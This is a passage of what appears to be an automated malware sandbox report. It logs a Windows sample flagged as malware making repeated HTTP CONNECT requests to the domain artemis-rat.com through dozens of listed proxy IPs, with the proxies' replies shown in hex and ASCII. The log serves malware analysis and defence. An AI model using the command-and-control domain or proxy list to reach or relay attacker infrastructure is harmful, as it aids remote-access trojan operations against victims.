                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                              Mar 11, 2024 08:37:23.242235899 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              819192.168.2.45183759.15.28.7631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.665790081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.663470984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.868233919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.554301023 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              820192.168.2.45257294.130.94.45807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.665864944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              821192.168.2.45033992.204.134.38286957284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.669146061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.257164955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.866651058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              822192.168.2.450186103.152.232.12381997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.671025038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              823192.168.2.451865212.118.43.143807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.673336029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.981436968 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              824192.168.2.452570103.163.51.254807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.716769934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              825192.168.2.45035640.76.160.14390027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.717205048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              826192.168.2.452575202.162.219.1010807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.717336893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              827192.168.2.452574103.86.109.38807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.720582962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              828192.168.2.452571115.127.31.6680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.721329927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              829192.168.2.452132107.180.90.8880787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.721692085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.866514921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              830192.168.2.451761109.69.0.17956787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.723529100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              831192.168.2.45257972.217.216.23941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.738070011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              832192.168.2.45257343.231.22.229807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.738440990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.150084972 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              833192.168.2.45258098.178.72.21109197284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.739700079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              834192.168.2.45269784.244.69.294437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.744002104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              835192.168.2.45270184.244.69.294437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.746047020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              836192.168.2.45258198.162.25.1641457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.746124029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              837192.168.2.45270484.244.69.294437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.747147083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              838192.168.2.45270784.244.69.294437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.748486996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              839192.168.2.45185636.37.189.6456787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.754416943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              840192.168.2.45260874.48.7.43807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.789866924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              841192.168.2.452577185.49.30.580817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.797770023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              842192.168.2.45198251.79.240.9431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.822988987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.665693045 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              843192.168.2.450314185.118.153.11080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.826872110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.461333990 CET202INHTTP/1.0 403 Forbidden
                                              Content-Length: 719
                                              Content-Type: text/html
                                              Date: Mon, 11 Mar 2024 07:23:50 GMT
                                              Expires: Mon, 11 Mar 2024 07:23:50 GMT
                                              Server: Mikrotik HttpProxy
                                              Proxy-Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              844192.168.2.452586167.249.29.2209997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.853107929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.645098925 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              845192.168.2.45258845.195.149.7910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.856256008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              846192.168.2.45258514.103.24.14880007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.856939077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              847192.168.2.45257891.202.230.21980807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.857045889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              848192.168.2.451212104.200.135.4641457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.863691092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              849192.168.2.45284743.134.238.254437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.875883102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              850192.168.2.45284843.134.238.254437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.877198935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              851192.168.2.45285043.134.238.254437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.878878117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              852192.168.2.45285143.134.238.254437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.879972935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              853192.168.2.45259145.11.95.16552127284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.881997108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.663130045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              854192.168.2.452673172.67.206.105807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.894323111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.048998117 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              855192.168.2.45264351.89.173.40545707284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.897983074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              856192.168.2.452429192.111.135.17183027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.898468971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              857192.168.2.45243998.188.47.13241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
